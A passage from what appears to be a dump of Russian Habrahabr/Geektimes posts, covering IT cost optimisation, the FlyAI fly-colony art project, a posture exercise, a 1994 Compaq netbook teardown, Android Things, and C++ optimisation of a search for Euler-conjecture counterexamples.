P(3,0,0,0,0), P(0,0,1,2,0), P(0,0,0,1,2)
9
5
4
P(0,4,0,0,0), P(3,0,0,1,0)
14
5
5
P(0,4,0,1,0)
19
4
6
P(0,5,0,1,0)
23
3
7
P(0,5,1,1,0)
26
8
....
31
P(5,7,6,3,8), P(5,8,6,3,7), P(6,7,6,3,7)
79
1
30
P(5,8,6,3,8), P(6,7,6,3,8), P(6,8,6,3,7)
80
1
31
P(6,8,6,3,8)
81
Таблица 2: Иллюстрация методики поиска оптимальной зависимости пользы для бизнеса от ИТ в зависимости от затрат. Все значения — в тысячных от ФОТ.
Таблицу выше я построил из предположения, что все пять категорий качества не зависят друг от друга и аддитивны. На практике это не совсем так, поэтому полученное пространство оптимальных решений нужно дополнительно проверять на аддитивность. По результатам проверки, некоторые из максимальных решений могут уменьшиться из-за эффекта диссинергии, а другие наоборот, вырасти из-за эффекта синергии.
Проверив все промежуточные решения на синергию/диссинергию, можно переходить к вычислению точки оптимальных затрат. Для этого, двигаясь в направлении возрастания затрат, для каждой точки нужно проверять значение правой производной dP/dx. Точки, в которых значение правой производной меньше или равно единице, нужно проверять на соотношение (P(x)-P(x0))/(x-x0) x0, где x0 – текущая точка. Первая точка, в которой это соотношение выполнится, и будет точкой оптимальных затрат.
На эскизе ниже я отмечу, как будет выглядеть рассчитанная область: Рисунок 2. Иллюстрация оптимальной зависимости P(x) по результатам вычисления (синяя линия на графике).
Теперь осталось только рассказать, что с этой точкой оптимальных затрат делать дальше: Как надо, как не надо и зачем вообще оптимизировать затраты на ИТ?
Как я и говорил ранее, точка оптимальных затрат со временем изменяется в связи с изменением бизнеса или изменением технологий. Неизменными остаются лишь приобретенное ранее оборудование, программы и технические решения. Поэтому, чтобы добиться от корпоративного ИТ максимального экономического эффекта, необходимо учитывать возможное изменения точки оптимальных затрат в будущем. На практике это означает, что: Капитальные расходы на ИТ должны быть не ниже текущего значения точки оптимальных затрат и учитывать ее возможное изменение в будущем, если такое изменение может привести к преждевременному списанию связанных с капитальными расходами технических решений.
Операционные расходы на ИТ должны обеспечивать максимальный долгосрочный экономический эффект для компании, с учетом как возможного изменения значения точки оптимальных затрат в будущем, так и дополнительных затрат, которые могут потребоваться для такого изменения.
Но зачастую, компаниям нет дела до экономического эффекта от применения информационных технологий, и под оптимизацией затрат на информационные технологии подразумевается только одно – снижение расходов на ИТ. Принципы такой оптимизации несколько отличаются: Вкладывать деньги в ИТ только в случае крайней необходимости.
Приобретать технические решения в достаточном для решения стоящих проблем размерах, но не более того.
Жесткий ценовой ценз — выбирать наиболее дешевые решения из всех возможных альтернатив.
Капитальные затраты по возможности переводить в операционные за счет аренды оборудования и программ, подписки на облачные сервисы.
Настраивать и развивать информационные системы исключительно силами штатных специалистов, без привлечения внешних подрядчиков.
Проблема в том, что подобная оптимизация не дает желаемой экономии – приобретенное по таким принципам оборудование и программы приходится списывать раньше времени, аренда в долгосрочной перспективе съедает больше денег, а штатным специалистам не хватает сил, чтобы реализовать весь заложенный в информационные системы функционал. В долгосрочной перспективе компания ничего не экономит, зато свою эффективность уменьшает значительно.
Сегодня многие уверены, что конкурентные преимущества создает умение экономить на ИТ, но на практике, подобная экономия только усугубляет финансовое положение в компании. Конкурентные преимущества сегодня создает умение выжимать из информационных технологий максимум пользы для бизнеса за вычетом затрат на них. Вот только между теоретическим знанием, как это сделать, и практической реализацией лежит пропасть из проб и ошибок.
Темой поиска баланса между пользой для бизнеса и затратами на ИТ я занимаюсь с 2007 года, и тем, кто решит заняться этим у себя в компании, я хочу посоветовать только одного – не бойтесь ошибаться. Как бы взвешено вы не принимали решения, ошибок вам не избежать, но бояться надо не ошибок, а того, что вы их не увидите и не сможете извлечь из них опыт. Вся теория выше – это высокоуровневое осмысление полученного мной опыта, и, возможно, в этой теории также есть ошибки. Именно по этой причине я делюсь ей, чтобы узнать о допущенных мной ошибках как можно раньше, и чуть раньше приблизить своих клиентов к достижению точки оптимальных затрат на ИТ.
Жду ваших комментариев! | https://habrahabr.ru/post/317560/ |
habrahabr | Проект FlyAI: искусственный интеллект обеспечивает существование колонии мух | ['flyai', 'искусственный интеллект', 'люди', 'насекомые'] |
Вот уже месяц жизнь колонии мух, расположенной в городе Дулут, Миннесота, США, полностью зависит от работы программного обеспечения. Речь идет о самообучающейся слабой форме ИИ, которая целиком... |
Вот уже месяц жизнь колонии мух, расположенной в городе Дулут, Миннесота, США, полностью зависит от работы программного обеспечения. Речь идет о самообучающейся слабой форме ИИ, которая целиком и полностью обеспечивает жизнь насекомых внутри специального сосуда. В частности, ИИ предоставляет мухам питание (сухое молоко с сахаром) и воду.
Жизнь насекомых зависит от того, насколько корректно компьютер идентифицирует объект, находящийся перед камерами. Если система определит этот объект, как муху и решит, что насекомым нужна подпитка, они ее получат. В случае ошибки мухи не получат питания и воды и будут страдать (насколько это возможно для мух) от голода и жажды в течение длительного времени. Сам проект получил название FlyAI, это некая пародия на управляемое при помощи компьютера поселение людей. Во всяком случае, так все это видит автор проекта.
«Мы должны давать себе отчет в том, чего можно ожидать от искусственного интеллекта, поскольку в любом случае он появится», — говорит Дэвид Боуэн ( David Bowen ) из Университета Миннесоты в Дулуте. Он считает, что необходимо уже сейчас задуматься над тем, что будет представлять собой настоящий искусственный интеллект, чтобы потом не было проблем. По мнению профессора, люди, несмотря на проблемы, смогут сделать так, что ИИ будет полезен человеку и не станет вредить ему.
Центральным элементом проекта FlyAI является самообучающаяся нейронная сеть. Понятно, что, как и большинство современных ИИ-систем, это не идеальный проект. У FlyAI не хватает базы изображений для эффективного обучения. Поэтому периодически система ошибается, идентифицируя мух как выключатели или другие объекты. В случае некорректной идентификации компьютер не «заводит» систему жизнеобеспечения, и мухи голодают и страдают от жажды, о чем уже говорилось выше. Но в любом случае, пока что колония живет, ей уже месяц и мухи чувствуют себя неплохо. Если что-то пойдет совсем неправильно, разработчик системы спасет насекомых, не допустив их массовой гибели. «Они умирают, я думаю, по естественным причинам», — говорит Боуэн. «Они получают возможность здесь состариться».
Проект, по его словам — это стилизованное воплощение мыслей специалиста по ИИ Ника Бострома, работающего в Оксфорде. Бостром считает, что открытость исследований специалистов, работающих над созданием искусственного интеллекта, может стать проблемой. В частности, это касается проекта Open AI, о котором уже публиковалась информация на Geektimes. «Если у вас появилась кнопка „сделать всем плохо“, вряд ли вы захотите поделиться ей со всеми», — заявляет Бостром. Но в случае OpenAI эта кнопка будет доступна всем и каждому.
Впрочем, Бостром считает, что искусственный интеллект должен быть благом для человека. «Для нас важно создать искусственный интеллект, у которого хватит ума учиться на своих ошибках. Он будет способен бесконечно совершенствовать себя. Первая версия сможет создать вторую, которая будет лучше, а вторая, будучи умнее оригинала, создаст ещё более продвинутую третью и так далее. В определённых условиях такой процесс самосовершенствования может повторяться до тех пор, пока не будет достигнут интеллектуальный взрыв – момент, когда интеллектуальный уровень системы подскочит за короткое время с относительно скромного уровня до уровня супер-интеллекта», — заявил он.
А Боуэн утверждает, что риск для человечества представляют не безграничные возможности будущей сильной формы ИИ, а программное обеспечение, от которого будет зависеть (в этом он не сомневается) жизнь человека. «Одна из проблем — это то, что мы даже не до конца понимаем, что такое искусственный интеллект», — говорит Боуэн. «И это выглядит устрашающе».
Сильная форма ИИ, конечно же, будет совсем не похожа на то, что собой представляют современные голосовые поисковые движки и цифровые ассистенты. Возможности искусственного интеллекта, вероятно, будут обширны, но и риски есть. Тот же Стивен Хокинг считает, что ИИ — это величайшая ошибка человечества. Билл Гейтс утверждает, что через несколько десятков лет искусственный интеллект будет уже достаточно развит для того, чтобы представлять собой причину для беспокойства человека. А Илон Маск назвал ИИ «главной угрозой существования человека». Программная платформа, которая является центром FlyAI, частенько ошибается
Конечно, сам проект может показаться несколько смешным, но его автор так не считает. Собственно, все, что он хотел — это привлечь внимание общественности к своему проекту и проблеме ИИ. Это ему, можно сказать, удалось. В любом случае, мы пока не знаем, когда появится полноценный ИИ, и появится ли он вообще. Это может произойти завтра, а может и через несколько десятков лет. Для того, чтобы быть безопасным для человека, машинный интеллект должен осознавать ценность жизни человека. Все же человек — не муха. | https://geektimes.ru/post/283688/ |
habrahabr | Проприоцепция для неспециалистов. Часть 1: Ровная спина стоя за 10 секунд | ['дмитрий спицын', 'соматика', 'проприоцепция', 'уроки для осанки'] | Совсем недавно мою статью о чувствах человека сильно штормило – оценка пользователей колебалась от +5 до -4. В комментариях отмечались такие забавные моменты, как:
Но да, я почитал про... | Совсем недавно мою статью о чувствах человека сильно штормило – оценка пользователей колебалась от +5 до -4. В комментариях отмечались такие забавные моменты, как: Но да, я почитал про проприоцептивную чувствительность. Не занимательно — вычурные слова для того, чтобы показать превосходство профессионалов данной сферы И при чем здесь количество чувств? По логике вашей статьи, вы не можете пользоваться кишечником, пока не осознаете как он работает. Собственно, расписывание на более подробные «чувства» является лишь бесполезным уточнением. Автор же просто вводит удобные ему «чувства», ведь он «Врач-невролог, сертифицированный преподаватель соматики» и учит людей «двигаться легко и без боли» (с).
Урок из данной статьи займёт 10-15 секунд и он позволит вам найти то внутреннее ощущение, которое позволит удобно держать ровную спину стоя длительное время. Вы на собственном опыте сможете убедиться в том, стоит ли выделять отдельно проприоцепцию (суставно-мышечное чувство).
Одно из самых частых упражнений, применяемых для постановки ровной осанки рекомендует прислониться затылком, спиной, ягодицами, задней частью ног к стене и, запомнив положение, сохранять его во время стояния и ходьбы.
Большинство пробовало такие упражнения на себе и многие из вас помнят, как сложно было удерживать ровную спину и как быстро осанка возвращалась в прежнее состояние. Если забыли это чувство скованности, неудобства и большого расхода энергии – можете повторить данное упражнение перед уроком. Итак, обещанный урок на 10-15 секунд!
Встаньте, посмотрите на свою осанку в зеркало или попросите сфотографировать себя в профиль, почувствуйте положение частей своего тела относительно друг друга.
Поставьте ноги вместе, пятки и носки, расставьте руки буквой «Т» и качнитесь только в голеностопных суставах вперёд, не отрывая пятки от пола, останьтесь на несколько секунд в таком положении «пизанской башни» и вернитесь в исходное положение, опустите руки.
Посмотрите в зеркало или сделайте контрольный снимок, заметьте результат. Внешне будет заметно выстраивание спины по одной прямой линии, но это только внешний эффект.
Внутреннее ощущение необычного удобства и ровности такой осанки – вот основной бонус правильного использования проприоцепции для обучения хорошей осанке.
Естественно, старые привычки постепенно вернут положение спины в обычное положение, однако вы уже знаете, как вспомнить внутреннее ощущение ровности за 10 секунд. Первоначально эффект сохраняется 3-5 минут, со временем, выполняя уроки на развитие проприоцептивных навыков, привычная осанка стоя поменяется на более ровную.
P.S. Скоро вы увидите ещё одну статью о проприоцепции – будем искать ровную спину сидя за 2 минуты. Также вы узнаете больше о нейрофизиологии поддержания положения тела в пространстве.
Для тех, кто хочет уменьшить сутулость, уже есть два урока на Гиктаймсе, опубликованные в рамках статей по туннельным синдромам. Часть вторая и четвертая . | https://geektimes.ru/post/283690/ |
habrahabr | Нетбук из 1994 года | ['нетбук', 'ноутбук', '80486'] | Вот этот красавец:
Всеми позабытый он пылился в актовом зале, который превратили в склад. Там я его и обнаружил в 2014-м. Sic transit gloria mundi, а ведь когда-то ноутбук блистал.
В 1994... | Вот этот красавец:
Всеми позабытый он пылился в актовом зале, который превратили в склад. Там я его и обнаружил в 2014-м. Sic transit gloria mundi, а ведь когда-то ноутбук блистал.
В 1994 году не существовал еще термин «нетбук», но выпущенный тогда фирмой Compaq девайс по имени Aero Contura 4/33C уже был им по духу и по сути. Он маленький и легкий даже по сегодняшним меркам, а его начинка позволяла лихо рассекать просторы Web 1.0. На Aero Contura 4/33C работает не только DOS и Win3.1, но даже Windows 95.
Вот параметры аппарата:
LCD 7.8'' VGA 640x480, 16 цветов/ CPU 80486SX-33/4 Mb RAM/ 256 Kb Video/ 1.2 Gb HDD*/ LPT, COM, EXT, PCMCIA. * винт явно проапгрейджен в конце 20 века
Правда, у девайса нет ни звуковой, ни сетевой карты, ни динамиков. Как же так, ведь термин «нетбук» подразумевает прежде всего устройство для сёрфинга по интернету? Тут все ок, об этом позже, давайте сначала рассмотрим девайс.
Вместо привычного сегодня тачпада аппарат имеет трекбол и 2 кнопки.
Сзади есть порты, которые сегодня тоже уже не встретить на ноутбуках.
Видим порт LPT, COM и DVI. Шучу, какой DVI может быть в 1994 году? Между LPT и COM располагается разъем, на который выведены дополнительные интерфейсы: внешний монитор, клавиатура и мышь PS/2.
С другого бока расположен слот PCMCIA и именно он окончательно закрепляет девайс в категории нетбуков.
Через PCMCIA можно вставлять различные устройства, в том числе и для выхода в интернет. Когда я устроился в 2002 на работу, данный ноутбук имел в комплекте под такой слот CD-ROM, FDD, звуковую плату, войс модем и сетевую карту. Сетевая где-то затерялась, а CD-ROM вместе со вторым экземпляром ноутбука оставил себе на память мой бывший начальник Юра .
Разбирается ноутбук не в пример современным собратьям легко и просто.
На фото видно поломанное крепление для батарейки биоса CR1220, сама же батарейка за давностью лет давно села. Поломку я выпаял, а вместо нее припаял стандартную биосовскую батарейку CR2032.
Но а где же сам процессор? Как они выглядели в те седые времена? Вынимаем плату.
Переворачиваем и вот он.
Вот он, родной.
Это процессор 486SX с частотой 33 МГц. 486-е были предшественниками первых Пентиумов. А само название Pentium I фирма Интел ввела в качестве коммерческого наименования процессоров с архитектурой 80586 собственного производства.
По размерам он ненамного меньше процессоров для ПК того же поколения.
Кулер на процессоре отсутствует, излишнее тепло с него отводится через терморезину на металлическую корзинку, в которой размещается системная плата.
Мало 4 Мб ОЗУ? Снизу корпуса есть заглушка, под ней скрывается разъем для установки плат расширения ОЗУ.
Выпускали платы расширения на 4, 8 и 16 Мб. Таким образом, максимально возможный размер оперативки в Aero Contura 4/33C составляет 20 Мб. Выглядит это расширение как-то так.
Как я писал, от лихих девяностых сохранилось несколько PCMCIA-устройств.
Войс модем 33.6К:
Дисковод 1.44 Mb:
Интерфейсная/звуковая карта:
Вновь найденный ноутбук я отнес к себе, почистил, включил в розетку, без особых надежд нажал на кнопку «Вкл»… и ноутбук сразу же завелся! Немного попищав про сбившееся время, загрузилась Windows 95. Среди программ обнаружились FAR, Дюна 2, Нортон утилиты 2000, Офис 97. Бэдов на винчестере нет. Кстати, Контура 4/33C изначально поставлялись с винчестерами в 84, 170 и 250 Mb. У меня же стоит винчестер на 1.2 Gb. Видимо, это следствие апгрейда, проведенного на рубеже тысячелетий.
Несмотря на солидный для компьютерной техники возраст(более 20 лет!) ноутбук находится в рабочем состоянии. Родная батарея, конечно, давно села. Дисплей показывает бледно, но это не следствие старости, а недостатки технологии производства экранов того времени. Зато битых пикселей нет.
Трудовой путь ноутбука был славен. В девяностых два таких девайса купили за границей и наклеили на клавиатуру русские буквы. На тот момент цена ноутбука в США составляла 2199$. Ноутбуками пользовался бизнесмен, пока в конце 90-х не купил себе более новый ноутбук на AMD K6-2/500 (теперь тоже у меня), а «нетбуки» были переданы на его фирму. В 2002-м, когда я пришел работать, они еще активно использовались, хотя к тому времени уже устарели.
Тем не менее, Aero Contura 4/33C применялись до 2006-2007 года. Но в конце трудовой карьеры судьба гордых старцев была незавидна. Один канул в небытие, а второй выдавался вновь нанятым сотрудникам по схеме «свободных компьютеров нет, мы вам дадим пока ноутбук». Обрадованные, что дали «ноутбук», сотрудники очень скоро начинали грустить- для середины двухтысячных 4 мегабайта оперативки и Windows 95(так же известная как «Масдай») было уже явно недостаточно. Промучавшись месяц-другой с «щедрым подарком», сотрудники отбрыкивались от него всеми конечностями. В конце концов, Aero Contura 4/33C с комплектом снесли на склад, а дальше вы знаете.
Иногда я включаю этот ноут, чтобы вновь ощутить дух того времени, когда были живы DOS и Win95, вместо контакта заводили «персональные странички» на 0.5 Мб, а интернет люди могли себе позволить только на работе. Сейчас все лучше и с компьютерами и с интернетами. Но порою вместо крутых игрушек почему-то хочется запустить квадратно-пиксельную Дюну 2 и порубиться, как когда-то. Еще интересное в сети про Compaq Aero Contura 4/33C
1. Сайт немецкого фаната Aero Contura 4/33C . Много полезной информации, винтажной рекламы и газетных статей по теме. Еще там можно почитать, как на сей девайс поставить Линукс.
2. Aero Contura 4/33C в Музее компьютеров.
3. Википедия про семейство ноутбуков Compaq Contura | https://geektimes.ru/post/283694/ |
habrahabr | Android и «интернет вещей» стали ближе друг к другу | ['Android Things', 'Weave'] | «Интернет вещей» мыслился своими создателями как среда, идеологически чуждая каким-либо софтверным или аппаратным ограничениям. Как говорится, как вам удобнее, так и делайте. Но вот насчет удобства... | «Интернет вещей» мыслился своими создателями как среда, идеологически чуждая каким-либо софтверным или аппаратным ограничениям. Как говорится, как вам удобнее, так и делайте. Но вот насчет удобства те или иных решений уже можно подискутировать. Зачастую именно простота в использовании и гибкость являются определяющими при выборе той или иной платформы. Вот почему Intel, как активный участник IoT-движения, хотел бы обратить внимание на новость от коллег из Google о выходе Developer Preview средства разработки Android Things и обновлении облачного сервиса Weave. Теперь Android-устройствам, в том числе и на платформе Intel, станет гораздо уютнее находиться в «интернете вещей» Android Things (прежнее название Brillo) — комплекс средств для разработки IoT-продуктов на базе Android , упрощающий процесс разработки и сокращающий ее продолжительность. В состав комплекса входят как новые, так и уже знакомые по Brillo компоненты, такие как Android Studio, Android Software Development Kit (SDK), Google Play Services и Google Cloud Platform , которые вскорости, по словам создателей, получат последние обновления безопасности и совместимости с последними версиями других компонентов Google. Weave — облачный сервис Google, созданный для того, чтобы каждому не пришлось городить свой собственный; готовый продукт, который разработчик может приспособить под свои конкретные нужды. Помимо средств взаимодействия с облачными сетевыми сервисами Google, такими как Google Assistant, Weave содержит Device SDK для поддерживаемых микроконтроллеров, консоль управления, схемы подключения датчиков и переключателей, список которых постоянно пополняется. В ближайшее время выйдет API для мобильных приложений под iOS и Android. Наконец, ведутся работы по объединению Weave с аналогичным продуктом Nest Weave для надежного и безопасного подключения двух классов устройств друг к другу.
Обо всех Android-продуктах для «интернета вещей» вы можете прочитать на странице разработчика . | https://habrahabr.ru/company/intel/blog/317580/ |
habrahabr | Сказка о потерянном времени | ['это ненормально', 'семь раз отмерь'] | Если честно, то не совсем и сказка, а суровая жизнь. Но время ведь потеряно совершенно настоящее, хоть и с пользой. А началось всё совершенно случайно. На одном сайте один умный товарищ написал... | Если честно, то не совсем и сказка, а суровая жизнь. Но время ведь потеряно совершенно настоящее, хоть и с пользой. А началось всё совершенно случайно. На одном сайте один умный товарищ написал пост о гипотезе Эйлера . Суть достаточно проста. Гипотеза Эйлера утверждает, что для любого натурального числа n>2 никакую n-ю степень натурального числа нельзя представить в виде суммы (n-1) n-х степеней других натуральных чисел. То есть, уравнения:
не имеют решения в натуральных числах.
Ну собственно так оно и было до 1966 года…
Пока Л. Ландер (L. J. Lander), Т. Паркин (T. R. Parkin) и Дж. Селфридж ( J. L. Selfridge) не нашли первый контрпример для n = 5. И сделали они это на суперкомпьютере того времени — CDC 6600 , разработанного под командованием не безызвестного Сеймура Крэя (Seymour Roger Cray) и имел этот суперкомпьютер производительность аж 3 MFLOPS. Их научная работа выглядела так:
То есть простым перебором на суперкомпьютере они нашли числа степени 5, которые опровергали гипотезу Эйлера: 27 5 + 84 5 + 110 5 + 133 5 = 144 5 .
И всё бы ничего, но другой умный товарищ спросил : " интересно, а вот кто–нибудь из программистов может набросать код для супер–современного i5 по поиску еще таких совпадений?... ".
Как вам уже понятно, предложение сработало как красная тряпка. Первое решение оказалось достаточно красивым и написанным с умом. Суть в том, что вначале считаем пятые степени для 1-N чисел, заносим их в таблицу и рекурсивно начинаем перебирать с самого низу четыре слагаемых пятых степеней, попутно ища в таблице сумму получившихся значений. Если нашли — вот оно и решение (индекс в таблице будет числом, степень которого мы нашли).
Вот этот первый вариант пользователя 2Alias : #include <iostream>
#include <algorithm>
#include <stdlib.h>
#include <vector>
#include <unordered_map>
using namespace std;
typedef long long LL;
const int N = 250;
LL p5(int x)
{
int t = x * x;
return t * (LL) (t * x);
}
vector<LL> p;
std::unordered_map<LL, int> all;
int res[5];
void rec(int pr, LL sum, int n)
{
if (n == 4)
{
if (all.find(sum) != all.end())
{
cout << "Ok\n";
res[4] = all[sum];
for (int i = 0; i < 5; ++i)
cout << res[i] << " ";
cout << "\n";
exit(0);
}
return;
}
for (int i = pr + 1; i < N; ++i)
{
res[n] = i;
rec(i, sum + p[i], n + 1);
}
}
int main()
{
for (int i = 0; i < N; ++i)
{
p.push_back(p5(i));
all[p.back()] = i;
}
rec(1, 0, 0);
return 0;
}
И как оно обычно бывает, я подумал, а можно ли быстрее? Заодно у людей возник вопрос, а что будет если проверить в этом деле C#. Я в лоб переписал решение на C# и программа показала примерно такой же результат по времени. Уже интересно! Но оптимизировать всё же будем C++. Ведь потом всё легко перенести в C#.
Первое что пришло в голову — убрать рекурсию. Хорошо, просто введём 4 переменные и будем их перебирать с инкрементом старших при переполнении младших. // N - до какого числа ищем 1 - N в степени 5
// powers - массив с посчитанными заранее степенями
// all = unordered_map< key=степень числа, value=само число>
uint32 ind0 = 0x02; // ищем начиная с 2
uint32 ind1 = 0x02;
uint32 ind2 = 0x02;
uint32 ind3 = 0x02;
uint64 sum = 0;
while (true)
{
sum = powers[ind0] + powers[ind1] + powers[ind2] + powers[ind3];
if (all.find(sum) != all.end())
{
// нашли совпадение - ура!!
foundVal = all[sum];
...
}
// следующий
++ind0;
if (ind0 < N)
{
continue;
}
else
{
ind0 = 0x02;
++ind1;
}
if (ind1 >= N)
{
ind1 = 0x02;
++ind2;
}
if (ind2 >= N)
{
ind2 = 0x02;
++ind3;
}
if (ind3 >= N)
{
break;
}
}
И тут же результат стал хуже. Ведь нам будут встречаться множество одинаковых сумм, большую часть которых рекурсивный алгоритм обходит. Допустим у нас числа от 1 до 3, переберём их:
111
112
113
121
122
123
131
132
133
…
Значит придётся смотреть комбинаторику, но мне это не сильно помогло, так как достаточного объёма знаний по этой теме я не имею, пришлось выписывать примерно такой же пример на бумажку и подумать. И решение нашлось: при инкременте старших разрядов, не надо сбрасывать младшие на самый минимум, а присваивать значение старшего всем младшим — так мы отсечём лишнее.
Код увеличения индексов стал таким: ...
// следующий
++ind0;
if (ind0 < N)
{
continue;
}
else
{
ind0 = ++ind1;
}
if (ind1 >= N)
{
ind0 = ind1 = ++ind2;
}
if (ind2 >= N)
{
ind0 = ind1 = ind2 = ++ind3;
}
if (ind3 >= N)
{
break;
}
Ура! И уже сразу чуть быстрее. Но что нам говорит профайлер? Большую часть времени мы сидим в unordered_map.find…
Начинаю вспоминать алгоритмы поиска и разнообразные знания(вплоть до демосцены). А что если перед проверкой в unordered_map как-то быстро отсекать часть ненужного?
Так появился ещё один массив, уже битовый (bitset). Так как числа нам в него не занести (они слишком большие), придётся быстро делать хэш из степени, приводить его к количеству бит в массиве и отмечать там. Всё это надо делать при построении таблицы степеней. В процессе написания оказалось, что std::bitset немного медленнее простого массива и минимальной логики что я набросал. Ну да ладно, это ерунда. А в целом ускорение оказалось существенным, около двух раз.
Много экспериментируя с размером bitset'a и сложностью хэша стало понятно, что по большому счёту влияет только память, причём для разных N по-разному и большая степень фильтрации обращений к unordered_map.find лучше только до определённого предела.
Выглядеть это стало примерно так: ...
// тут теперь мы быстро фильтруем сумму по хэшу и битовой таблице
if (findBit(sum))
{
// и только потом проверяем в map, а проверять надо - ведь у нас коллизии из-за хэша
if (all.find(sum) != all.end())
{
// нашли!
}
}
// следующий
...
Дальше возникла проблема номер два. Первый пример из далёкого 1966 года имел максимальное число 144 5 (61 917 364 224), а второй (2004 год) уже 85359 5 (4 531 548 087 264 753 520 490 799) — числа перестают влезать в 64 бита…
Идём самым простым путём: берём boost::multiprecision::uint128 — вот его нам хватит надолго! Это из-за того, что я пользуюсь MS CL, а он просто не поддерживает uint128, как все остальные компиляторы. Кстати, за время поиска решения проблемы uint128 и компиляторов я ещё узнал про шикарный сайт — Compiler Explorer . Прямо в онлайне можно скомпилировать код всеми популярными компиляторами разных версий и посмотреть во что они транслируют его(ассемблер), причём с разными флагами компиляции. MS CL тоже есть, но на бета сайте. И помимо С++ есть Rust , D и Go . Собственно, по коду и стало понятно, что MS CL совсем не понимает 128 составные целые, все компиляторы транслируют перемножение двух 64 битных в 128 битную структуру за три умножения, а MS CL — за четыре. Но вернёмся к коду.
С boost::multiprecision::uint128 производительность упала в 25 раз. И это как-то совсем неправильно, ведь в теории должно быть не более 3х раз. Забавно, что на столько же упала производительность C# версии с типом decimal (он хоть и не совсем целочисленный, но его мантисса 96бит). А предварительная фильтрация обращений к Dictionary (своеобразный аналог unordered_map из STL) — работает хорошо, ускорение очень заметно.
Ну значит сами понимаете — стало обидно. Столько уже сделано и всё зря. Значит будем изобретать велосипед! То есть простой тип данных uint128. По сути, нам же нужно только присваивание, сравнение, умножение и сложение. Не так и сложно, но процесс в начале пошёл не туда, так как сначала я взялся за умножение и дошло это до использования ассемблера. Тут не чем гордиться, лучше всего себя показали интринсики . Почему процесс пошёл не туда? А нам умножение-то и не важно. Ведь умножение участвует только на этапе просчёта таблицы степеней и в основном цикле не участвует. На всякий случай в исходниках остался файл с умножением на ассемблере — вдруг пригодится. friend uint128 operator*(const uint128& s, const uint128& d)
{
// intristic use
uint64 h = 0;
uint64 l = 0;
uint64 h2 = 0;
l = _mulx_u64(d.l, s.l, &h);
h += _mulx_u64(d.l, s.h, &h2);
h += _mulx_u64(d.h, s.l, &h2);
return uint128( h, l);
}
Со своим uint128 производительность тоже, конечно, просела, но всего на 30% и это отлично! Радости полно, но профайлер не забываем. А что если совсем убрать unordered_map и сделать из самописного bitset'a подобие unordered_map'a? То есть после вычисления хэша суммы мы можем уже использовать это число как индекс в ещё одной таблице(unordered_map тогда не нужен совсем). // вот так выглядит самописный map
boost::container::vector<CompValue*> setMap[ SEARCHBITSETSIZE * 8 ];
...
// ComValue просто контейнер для степени и числа
struct CompValue
{
...
mainType fivePower;
uint32 number;
};
// Поиск по битовому массиву и самописному map
inline uint32 findBit(mainType fivePower)
{
uint32 bitval = (((uint32)((fivePower >> 32) ^ fivePower)));
bitval = (((bitval >> 16) ^ bitval) & SEARCHBITSETSIZEMASK);
uint32 b = 1 << (bitval & 0x1F);
uint32 index = bitval >> 5;
if((bitseta[index] & b) > 0)
{
for (auto itm : setMap[bitval])
{
if (itm->fivePower == fivePower)
{
return itm->number;
}
}
}
return 0;
}
Так как проект совершенно несерьёзный и никакой полезной нагрузки не нёс, я сохранял все способы перебора, поиска и разных значений через жуткий набор дефайнов и mainType как раз один из них — это тип куда пишется степень числа, чтобы подменять его при смене только один раз в коде. Уже на этом этапе все тесты можно проводить с uint64, uint128 и boost::multiprecision::uint128 в зависимости от дефайнов — получается очень интересно.
И знаете, введение своего map'а — помогло! Но не на долго. Ведь понятно, что map не просто так придуман и используется везде, где только можно. Опыты — это, конечно, подтверждают. При определённом N (ближе к 1 000 000), когда все алгоритмы уже тормозят, голый map(без предварительного bitset'a) уже обходит самописный аналог и спасает только значительное увеличение битового массива и массива где хранятся наши значения степеней и чисел, а это огромное количество памяти. Примерный мультипликатор около N * 192, то есть для N = 1 000 000 нам нужно больше 200мб. А дальше ещё больше. К этому моменту ещё не пришло понимание, почему так падает скорость с ростом массива степеней, и я продолжил искать узкие места вместе с профайлером.
Пока происходило обдумывание, я сделал все испробованные способы переключаемыми. Ибо мало ли что.
Одна из последних оптимизаций оказалось простой, но действенной. Скорость C++ версии уже перевалила за 400 000 000 переборов в секунду для 64бит ( при N = 500 ), 300 000 000 переборов для 128 бит и всего 24 000 000 для 128 бит из boost, и влиять на скорость уже могло практически всё. Если перевести в Гб, то чтение получается около 20Гб в секунду. Ну может я где-то ошибся…
Вдруг стало понятно, что пересчитывать всю сумму на каждом проходе не надо и можно ввести промежуточную. Вместо трёх сложений будет одно. А пересчитывать промежуточную только при увеличении старших разрядов. Для больших типов это, конечно, сильнее заметно. mainType sum = 0U, baseSum = 0U;
baseSum = powers[ind1] + powers[ind2] + powers[ind3];
while(true)
{
sum = baseSum + powers[ind0];
...
// refresh without ind0
baseSum = powers[ind1] + powers[ind2] + powers[ind3];
}
Тут уже задача начинала надоедать, так как быстрее уже не получалось и я занялся C# версией. Всё перенёс туда. Нашёл уже готовый, написанный другим человеком UInt128 — примерно такой же простой, как и мой для C++. Ну и, конечно, скорость сильно подскочила. Разница оказалась меньше чем в два раза по сравнению с 64 битами. И это у меня ещё VS2013, то есть не roslyn (может он быстрее?).
А вот самописный map проигрывает по всем статьям Dictionary. Видимо проверки границ массивов дают о себе знать, ибо увеличение памяти ничего не даёт.
Дальше уже пошла совсем ерунда, даже была попытка оптимизировать сложение интринсиками, но чисто C++ версия оказалась самой быстрой. У меня почему-то не получилось заставить инлайниться ассемблерный код.
И всё же постоянно не отпускало чувство, что я что-то не вижу. Почему при росте массива всё начинает тормозить? При N = 1 000 000 производительность падает в 30 раз. Приходит в голову кэш процессора. Даже попробовал интринсик prefetch, результата — ноль. Пришла мысль кэшировать часть перебираемого массива, но при 1 000 000 значений (по 20 байт) как-то глупо выглядит. И тут начинает вырисовываться полная картина.
Так как числа у нас 4, есть 4 индекса, которые берут значения из таблицы. Таблица у нас постоянно возрастающих значений и сумма всех четырёх степеней у нас постоянно возрастающая (до переключения старших индексов). И разность степеней становится всё больше и больше.
2 5 это 32, а 3 5 это уже 243. А что если искать прямо в том же массиве просчитанных степеней обычным линейным поиском, сначала выставляя начальное значение на самый большой индекс и сохраняя индекс последнего найденного меньшего значения чем наша сумма (следующая будет больше) и использовать этот сохранённый индекс как начальную точку при следующем поиске, ведь значения не будут сильно меняться… Бинго!
Что в итоге? uint32 lastRangeIndex = 0;
// линейный поиск в массиве степеней
inline uint32 findInRange(mainType fivePower, uint32 startIndex)
{
while (startIndex < N)
{
lastRangeIndex = startIndex;
if (powers[startIndex] > fivePower)
{
return 0;
}
if (powers[startIndex] == fivePower)
{
return startIndex;
}
++startIndex;
}
return 0;
}
...
// главный цикл поиска
baseSum = powers[ind1] + powers[ind2] + powers[ind3];
